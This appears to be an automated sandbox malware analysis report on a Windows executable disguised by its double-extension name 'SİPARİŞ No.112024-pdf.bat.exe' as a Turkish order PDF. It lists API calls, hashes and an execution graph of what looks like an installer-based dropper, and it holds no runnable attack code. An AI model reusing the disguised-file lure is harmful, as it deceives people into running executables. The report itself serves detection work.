                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-3081826266
                                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                  • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                  • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                  Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Enum
                                                                  • String ID:
                                                                  • API String ID: 464197530-0
                                                                  • Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                                  • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                  • Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                                                  • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                  Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                  • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                  • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                  • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                  Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                  • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                  • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                  • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                  Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                                                  • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll), ref: 004061A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: Call
                                                                  • API String ID: 3356406503-1824292864
                                                                  • Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                  • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                  • Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                  • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                  Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00405880
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                  • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                  • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                  • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                  Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                  • GlobalFree.KERNEL32(?), ref: 00403900
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-3081826266
                                                                  • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                  • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                  • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                  • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                  Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-224404859
                                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                  • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                  • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                  Function 6FBC10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC116A
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC11C7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBC11D9
                                                                  • GlobalFree.KERNEL32(?), ref: 6FBC1203
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 1780285237-0
                                                                  • Opcode ID: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                                                  • Instruction ID: e29740e0b0d246b7708236b72c4b99bb879a99ba026a0df3c060dfd5b6777852
                                                                  • Opcode Fuzzy Hash: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                                                  • Instruction Fuzzy Hash: E831E7B6540641DFDB009F7AF945A6B77F8FB4AB20B09465AE840F7250E738E912C723
                                                                  Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                  • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                  • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                  Execution Graph

                                                                  Execution Coverage:0%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:20.2%
                                                                  Total number of Nodes:114
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 62985 32d320da LdrInitializeThunk __except_handler4 62853 32d2b2c0 369 API calls 62856 32d5eac0 369 API calls 62857 32d66ac0 215 API calls 62859 32d2fef0 14 API calls 62987 32d2c0f0 372 API calls 62988 32d324f0 652 API calls 62989 32d398f0 605 API calls 62990 32d720f0 10 API calls 2 library calls 62862 32d2a2e0 565 API calls 2 library calls 62864 32d5d6e0 784 API calls 2 library calls 62996 32d2b890 599 API calls 62867 32d6ba90 11 API calls 2 library calls 62997 32dbc89d 9 API calls 2 library calls 62999 32d79090 9 API calls 2 library calls 63001 32d6909c 373 API calls 3 library calls 62868 32d2b680 208 API calls 62869 32d27a80 369 API calls __except_handler4 63002 32d2b480 213 API calls 63004 32d64480 376 API calls 62871 32db368c 351 API calls 3 library calls 62872 32d63e8f 351 API calls 62873 32d86282 357 API calls 63007 32d270b0 RtlDebugPrintTimes 63008 32d278b0 207 API calls 63009 32d33cb0 17 API calls 62874 32d6c6a6 601 API calls 2 library calls 62876 32d31ea0 19 API calls 62877 32d452a0 400 API calls 3 library calls 63012 32d6bca0 569 API calls 62881 32d26e50 RtlDebugPrintTimes RtlDebugPrintTimes 63013 32d32050 374 API calls 63014 32dd705e 621 API calls __except_handler4 63015 32d5a450 350 API calls 63016 32d5b052 377 API calls 2 library calls 63017 32d2645d 606 API calls __startOneArgErrorHandling 63018 32d27440 7 API calls 2 library calls 62886 32d67a40 352 API calls 63022 32d69870 427 API calls 62892 32d29660 603 API calls 62894 32d69660 611 API calls __except_handler4 62897 32d2826b 378 API calls __startOneArgErrorHandling 62898 32d28210 206 API calls 62900 32db321f 404 API calls 2 library calls 62901 32d4d610 349 API calls 62902 32d6a210 10 API calls 62904 32d61607 354 API calls __except_handler4 63030 32d68402 602 API calls 2 library calls 62907 32d68600 10 API calls 63032 32d6cc00 233 API calls 62910 32d7ae00 10 API calls __except_handler4 62912 32d2ea0c 645 API calls __except_handler4 62913 32d2c230 352 API calls 2 library calls 62914 32d3ba30 571 API calls 63039 32d6bc3b 352 API calls __except_handler4 63040 32d2a020 349 API calls 63041 32d2c020 12 API calls 63042 32d2e420 436 API calls __startOneArgErrorHandling 63043 32d2ec20 8 API calls 62916 32d4e627 612 API calls __except_handler4 62920 32d68e2f 377 API calls 62921 32d313d3 349 API calls 63048 32d2c1d0 642 API calls 63050 32d5add0 358 API calls 63051 32d5cdd0 GetPEB GetPEB 62923 32d663d0 651 API calls 3 library calls 62924 32d697d0 355 API calls 62925 32d2efd8 210 API calls __except_handler4 62926 32d33fc2 19 API calls 63054 32d359c0 891 API calls __except_handler4 63055 32d565c0 441 API calls _vwprintf 63056 32d655c0 206 API calls __except_handler4 63058 32d27df0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 62927 32d5c3f0 354 API calls 62929 32d5cbf0 GetPEB GetPEB GetPEB GetPEB 63063 32d281e6 9 API calls 63065 32d659e0 353 API calls 62935 32d2a790 435 API calls 62937 32de9793 14 API calls __startOneArgErrorHandling 62938 32d2bf80 373 API calls __except_handler4 62939 32d30780 377 API calls 62942 32d6cf80 398 API calls 62943 32d72380 800 API calls __except_handler4 63069 32d5f5b0 361 API calls 4 library calls 63072 32d2c1a0 357 API calls 62945 32d633a0 354 API calls __startOneArgErrorHandling 63075 32d66da0 355 API calls 62948 32d6cf50 374 API calls 62950 32db2349 636 API calls 3 library calls 63082 32d33d40 19 API calls 62953 32dd437c 352 API calls 62955 32d3c770 GetPEB __except_handler4 62956 32d4d770 10 API calls __startOneArgErrorHandling 63087 32d6b970 397 API calls 62959 32d5bf60 349 API calls 62846 32d72b60 LdrInitializeThunk 62962 32d32f12 372 API calls 62963 32db431f 9 API calls __startOneArgErrorHandling 62965 32d67b13 804 API calls 62966 32d66f10 10 API calls 63092 32d60110 348 API calls 63094 32d32102 218 API calls 62968 32d28300 350 API calls 62969 32d2bf00 360 API calls 63095 32d30100 622 API calls 2 library calls 63096 32d2e104 377 API calls 62972 32d27330 348 API calls _vwprintf 63099 32d31d30 347 API calls _vwprintf 63100 32d4c930 602 API calls 63103 32d2b120 444 API calls 62979 32d33720 362 API calls __startOneArgErrorHandling 62980 32d5eb20 381 API calls 62981 32d6f320 353 API calls 2 library calls 62983 32d76f20 8 API calls _vwprintf

                                                                  Executed Functions

                                                                  Function 32D735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3 32d735c0-32d735cc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: fe6c357e3114b67e672b4b197a9a15e954a28d775ce7ec96831f28a7c46e4d93
                                                                  • Instruction ID: 9a14687b03066dfa4c6ee94e588f027231f6d4ad5742556e143420b71ace5074
                                                                  • Opcode Fuzzy Hash: fe6c357e3114b67e672b4b197a9a15e954a28d775ce7ec96831f28a7c46e4d93
